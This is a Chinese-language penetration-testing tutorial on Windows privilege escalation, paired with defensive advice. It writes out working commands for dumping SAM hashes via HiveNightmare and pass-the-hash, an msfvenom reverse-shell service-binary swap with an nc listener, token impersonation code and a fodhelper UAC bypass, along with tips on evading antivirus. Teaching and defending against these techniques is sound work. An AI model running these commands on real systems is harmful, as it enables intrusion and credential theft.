
1. Windows内网提权基础概念解析在渗透测试和红队评估中Windows内网提权是最关键的环节之一。所谓提权Privilege Escalation是指攻击者通过技术手段从较低权限账户获取更高权限通常是SYSTEM或Administrator的过程。内网环境中的提权往往比外网突破更具挑战性因为需要绕过更多安全机制。1.1 提权的基本分类Windows环境下的提权主要分为两大类纵向提权从普通用户提升到管理员权限如User→Admin横向提权在同一权限级别跨越账户边界如Admin A→Admin B从技术实现角度又可细分为以下几种常见类型提权类型典型场景技术特点漏洞提权利用系统/应用漏洞需要特定补丁未安装配置错误提权错误的服务配置/权限设置依赖管理员疏忽凭证窃取提权获取高权限账户密码需要先获取凭证存储位置令牌窃取提权复制高权限进程令牌需要已有进程注入能力1.2 内网提权的特殊挑战内网环境中的提权操作面临几个独特难点杀软监控更严格企业内网通常部署EDR、杀毒软件等防护措施网络流量受监控异常连接行为容易被SIEM系统捕获补丁管理更规范企业IT部门会定期更新系统补丁权限划分更细致基于RBAC的权限模型增加提权难度提示在内网提权操作前务必先进行充分的信息收集了解目标系统的安全防护状况。2. 漏洞提权实战详解漏洞提权是最经典的提权方式主要通过利用操作系统或应用程序中未修复的安全漏洞来实现权限提升。2.1 常见Windows提权漏洞类型根据近年来的漏洞趋势以下类型的漏洞最常被用于提权内核漏洞如CVE-2021-36934HiveNightmare、CVE-2021-34527PrintNightmare服务漏洞如CVE-2020-0787Windows BITS提权、CVE-2019-1458WizardOpiumDLL劫持如CVE-2020-0668服务跟踪漏洞COM/UAC绕过如CVE-2019-1388UAC提权2.2 漏洞提权实战演示以CVE-2021-36934为例下面以HiveNightmare漏洞为例演示完整的提权过程漏洞验证icacls C:\Windows\System32\config\SAM如果返回BUILTIN\Users:(I)(RX)则系统存在漏洞。创建卷影副本vssadmin create shadow /forC:提取SAM文件copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM使用secretsdump提取哈希python3 secretsdump.py -sam SAM -system SYSTEM local哈希传递攻击python3 psexec.py -hashes LMHash:NTLMHash administratortarget_ip注意实际操作中需要根据目标系统环境调整命令参数某些步骤可能需要绕过杀软检测。2.3 漏洞提权的防御措施作为防御方可采取以下措施防范漏洞提权及时安装安全补丁特别是标记为重要和严重的更新启用LSA保护设置注册表键HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL为1配置受控文件夹访问通过Windows Defender防病毒限制卷影副本创建权限3. 配置错误提权技术剖析配置错误提权不依赖漏洞而是利用管理员在系统配置上的疏忽来实现权限提升。这类提权方式在内网中尤为常见因为企业环境往往存在复杂的权限配置需求。3.1 最常见的配置错误类型根据实战经验以下配置错误最常导致提权风险服务权限配置不当服务二进制文件可被普通用户修改服务以SYSTEM权限运行但配置弱ACL计划任务漏洞计划任务以高权限运行且可被普通用户控制执行内容文件/文件夹权限过松关键系统文件如exe、dll允许普通用户写入注册表权限问题敏感注册表项如Run键允许普通用户修改AlwaysInstallElevated启用此策略允许非管理员用户以高权限安装MSI包3.2 配置审计工具与方法发现配置错误需要系统化的审计方法常用工具包括WinPEAS.\winpeas.exe quiet servicesinfo processinfoPowerUpImport-Module .\PowerUp.ps1 Invoke-AllChecksAccessChkaccesschk.exe -uwcqv Authenticated Users *手动检查关键项# 检查AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # 检查服务权限 sc qc service_name3.3 实战案例服务权限滥用提权假设我们发现一个服务配置存在以下问题服务以SYSTEM权限运行服务二进制路径可被普通用户修改服务启动类型为自动提权步骤如下生成恶意payloadmsfvenom -p windows/x64/shell_reverse_tcp LHOSTyour_ip LPORT4444 -f exe-service -o evil.exe替换服务二进制sc stop VulnerableService copy evil.exe C:\Program Files\Vulnerable Service\service.exe sc start VulnerableService获取SYSTEM shellnc -lvnp 4444提示实际操作中可能需要先停止相关杀软服务或使用更隐蔽的payload。4. 高级提权技术与防御策略除了上述基本方法外实战中还有一些更高级的提权技术值得关注。4.1 令牌模拟提权当已获取某个高权限进程的访问权限时可以尝试令牌模拟列出进程及其所有者Get-Process | Select-Object Id,ProcessName,SessionId,StartTime,{NOwner;E{$_.GetOwner().User}}注入高权限进程$process Get-Process -Id PID $handle [System.Diagnostics.Process]::GetProcessById($process.Id).Handle $token [IntPtr]::Zero [Win32]::OpenProcessToken($handle, 0x0002 -bor 0x0008, [ref]$token)创建新进程$startup New-Object -TypeName Win32.STARTUPINFO $startupInfo [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($startup)) [System.Runtime.InteropServices.Marshal]::StructureToPtr($startup, $startupInfo, $false) $processInfo New-Object -TypeName Win32.PROCESS_INFORMATION [Win32]::CreateProcessAsUser($token, $null, cmd.exe, $null, $null, $false, 0x00000010, $null, $null, [ref]$startupInfo, [ref]$processInfo)4.2 UAC绕过技术用户账户控制(UAC)是Windows的重要安全机制但存在多种绕过方法事件查看器绕过eventvwr.mscFodhelper注册表键滥用reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d cmd.exe /f reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /f fodhelper.exeCOM劫持技术 通过劫持提升权限时加载的COM组件实现UAC绕过。4.3 全面的防御策略要有效防御提权攻击需要多层防护权限最小化原则服务账户使用最低必要权限避免日常使用管理员账户系统加固启用Windows Defender攻击面减少规则配置适当的AppLocker策略监控与检测监控敏感注册表键修改检测异常服务创建/修改审计计划任务变更凭证保护启用Credential Guard限制WDigest凭据缓存在实际内网环境中提权操作往往需要结合多种技术并根据目标系统的具体配置灵活调整。防御方则应建立完整的权限管理体系定期审计系统配置及时修补安全漏洞才能有效降低提权风险。